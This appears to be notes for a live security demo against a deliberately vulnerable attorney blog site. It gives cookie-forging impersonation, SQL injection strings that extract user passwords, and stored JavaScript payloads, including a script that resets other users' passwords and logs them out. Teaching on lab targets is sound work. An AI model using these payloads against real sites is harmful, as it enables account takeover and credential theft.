Attorney Blog Site

Cookie Manipulation

When the user logs in a cookie is set with the users username. This can be modified to be any user, thus becoming that user. Try using a chrome extension like EditThisCookie to make it easy and change the user to 'admin' or another user in the comments.

SQL Injection Queries

The SQL can be injected via the username in the cookie.

Test if sql injection works

mstubenberg' OR '1' = '1

Get password for user

fakeuser' UNION ALL SELECT "test" as test,password FROM users WHERE username = 'attorney1

Get all the users information using ID

fakeuser' UNION ALL SELECT username,password FROM users WHERE ID = '2

JavaScript Injection

You can add javascript directly into the text box for a post which is then executed by the users browser.

Enter the script below into a post and check the console to see if "It Worked" printed. This means JavaScript injection worked!

<script> console.log("It worked!"); </script>

This script will pop up an alert window letting everyone know that you're a great hacker.

<script> alert("The site has been hacked!"); </script>

Script to change the password of the user and then log them out unless they are the user "hackerman" Note: This one should be dropped as an example because it then prohibits any of the audience from playing with the site.

Do not use this during a live demo

<script> setTimeout(function(){ console.log("It worked"); if($("#accountinfousername").text() != "hackerman"){ if($("#logoutbutton").length > 0 && $("#resetpasswordsuccess").length == 0){ $("#resetpassword").val("pa$$word"); $("#resetpasswordbutton").click(); }else if($("#resetpasswordsuccess").length > 0){ $("#logoutbutton").click(); }else{ console.log("Waiting for user to login"); } } },1000); </script>